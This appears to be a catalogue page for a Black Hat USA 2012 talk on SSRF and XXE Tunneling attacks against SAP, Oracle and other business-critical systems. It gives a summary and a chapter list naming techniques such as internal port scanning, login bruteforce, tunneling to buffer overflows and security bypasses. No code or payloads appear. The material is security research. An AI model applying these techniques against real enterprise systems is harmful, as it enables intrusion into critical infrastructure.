SSRF vs Business Critical Applications

Explore a comprehensive analysis of Server Side Request Forgery (SSRF) attacks and their impact on business-critical applications in this Black Hat USA 2012 conference talk. Delve into the intricacies of SSRF vulnerabilities, with a focus on XXE Tunneling, and learn how these techniques can bypass multiple layers of security defenses. Discover how attackers can exploit trusted sources to compromise secured systems, using SAP as a practical example. Examine various SSRF vulnerabilities that enable internal network port scanning, unauthorized HTTP requests, and backend bruteforcing. Gain insights into the powerful XXE Tunneling technique and its potential to reopen old attack vectors and create new ones in business-critical systems. Learn about the OWASP-EAS project's XXEScanner tool, designed to gather critical information, perform scans, and execute attacks on vulnerable hosts or backends. Understand the implications of these attacks on enterprise resource planning (ERP) systems, portals, business intelligence platforms, and industrial control systems.

Intro
2 ERP Scan
Enterprise applications: Definitions
Business-critical systems architecture
Secure corporate network
Corporate network attack scenario
SSRF History: Basics
SSRF history: World research
Trusted SSRF: Oracle Database
SSRF Types: SAP
Remote SSRF: Subtypes
Simple Remote SSRF: Login bruteforce
XXE Attacks on other services
Full Remote SSRF
Remote SSRF threats
XXE Tunneling to Verb Tampering
XXE Tunneling to Buffer Overflow (Hint 2)
XXE Tunneling to Buffer Overflow: Packet B
XXE Tunneling to Buffer Overflow (Hint 3)
XXE Tunneling to Rsh
Bypass SAP security restrictions
SAP Gateway server security bypass: Exploit
SAP Message Server security bypass
Oracle DB security bypass
Conclusion?
Purpose
How is it working?
Few steps
Action: Test
Action: Scan
Action: Attack
DEMO